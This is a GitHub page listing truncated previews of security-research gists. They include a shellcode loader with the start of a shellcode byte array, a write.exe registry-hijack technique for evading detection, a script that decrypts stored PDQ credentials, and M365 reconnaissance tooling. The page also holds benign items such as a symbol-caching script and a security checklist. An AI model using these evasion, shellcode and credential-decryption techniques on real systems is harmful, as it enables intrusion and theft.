Skip to content

Instantly share code, notes, and snippets.

View RalphDesmangles's full-sized avatar

RalphDesmangles

11 followers · 2 following
View GitHub Profile
@cpuidlfence
cpuidlfence / mov_gs_60
Created September 4, 2025 16:37
// list of mov rax, gs:[60h] candidates in all modules on Windows
//
// mentioned in this tweet : https://x.com/dudeperfectdog/status/1963625066215727320
//
// use +0x0 as your search to find candidates with it at the beginning of the function
//
// code will come later!
[[IN]] C:\Windows\System32\aadauthhelper.dll
==> SafeAllocaFreeToHeap+0x0 (RVA: 0x45590)
@daaximus
daaximus / symcache.ps1
Created September 1, 2025 14:06
symcache - recurse and dump all windbg symbols for a given directory
# probably exists in a better form; but script is useful for caching OS modules based on major OS version/build and file
# hash. intended to make life easier, ymmv.
#
# .\symcache.ps1 -src "C:\Windows\System32\drivers" -dst "X:\Windows\drivers"
# ^^ This will copy and organize the bins in the subdirectory and recurse through all subdirectories, and then download
# the symbols if they are available.
#
# - daax
param(
@ThePirateWhoSmellsOfSunflowers
ThePirateWhoSmellsOfSunflowers / badsuccessordumper_postpatch.py
Created August 31, 2025 17:54
import argparse
import datetime
import logging
import os
import random
import struct
import sys
from binascii import hexlify, unhexlify
from six import ensure_binary
@whokilleddb
whokilleddb / JasonToddIsTheBestRobin.c
Created August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
@whokilleddb
whokilleddb / LowNtReadFile.c
Created August 12, 2025 21:19
Read contents of a file using LowNtReadFile
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ntdll.lib")
#define FILE_TO_READ L"\\??\\C:\\Users\\DB\\Desktop\\test.txt"
EXTERN_C NTSTATUS NtOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);
@HackingLZ
HackingLZ / m365_osint_recon.py
Created August 7, 2025 16:28
#!/usr/bin/env python3
"""
M365 OSINT Reconnaissance Tool
Based on techniques from: https://dstreefkerk.github.io/2025-07-m365-email-osint-after-lockdown/
This script performs modern M365/Azure AD reconnaissance after Microsoft's lockdown of traditional
enumeration methods. It uses multiple validation techniques to discover organizational information
and attempts to infer MOERA domains.
"""
@mblzk
mblzk / README.md
Last active July 15, 2025 02:48
Proxying binary execution through write.exe

Proxying binary execution through write.exe

Write.exe is a wrapper binary for launching wordpad. Historically it was used to launch Microsoft Write, a very basic word processor from pre-2000 era. It has been left as a compatibility stub from Windows 95 onwards.

This binary checks HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\wordpad.exe registry key for the location of wordpad's executable, which can be created by regular user. This might be utilized to confuse detection/application control solutions that rely on parent-child relationships. Resulting process will be spawned as a child to the Windows-signed (Signing Level 12) write.exe.

If one controls a domain, it is possible to utilize UNC paths to run remote binaries without dropping them to the disk. This requires additional steps to bypass security prompt.

tl;dr

I want to just run an exe

@odzhan
odzhan / crt.c
Last active January 17, 2026 21:16
Writing Tiny Executables in C
/**
Compile with your C console project.
*/
#include <stdio.h>
#include <windows.h>
#define __UNKNOWN_APP 0
#define __CONSOLE_APP 1
#define __GUI_APP 2
@garrettfoster13
garrettfoster13 / decrypt.py
Created April 11, 2025 19:13
decrypting PDQ creds
import hashlib
import struct
import argparse
from Crypto.Cipher import AES #pip install pycryptodome
def decrypt(blob, key):
"""Decrypt PDQ credential blobs"""
#Format for the blob is [header][ivlen][iv][encdata]
#Example blob: 28656e63727970746564290010644d18eb7817dad6de5f531b1b0b60113087662f3cf0ffdaa7760418c15ee6ea
#Example blob: [28656e637279707465642900][10][644d18eb7817dad6de5f531b1b0b6011][3087662f3cf0ffdaa7760418c15ee6ea]
@mattppal
mattppal / security-checklist.md
Last active February 25, 2026 18:16
A simple security checklist for your vibe coded apps

Frontend Security

Security Measure Description
Use HTTPS everywhere Prevents basic eavesdropping and man-in-the-middle attacks
Input validation and sanitization Prevents XSS attacks by validating all user inputs
Don't store sensitive data in the browser No secrets in localStorage or client-side code
CSRF protection Implement anti-CSRF tokens for forms and state-changing requests
Never expose API keys in frontend API credentials should always remain server-side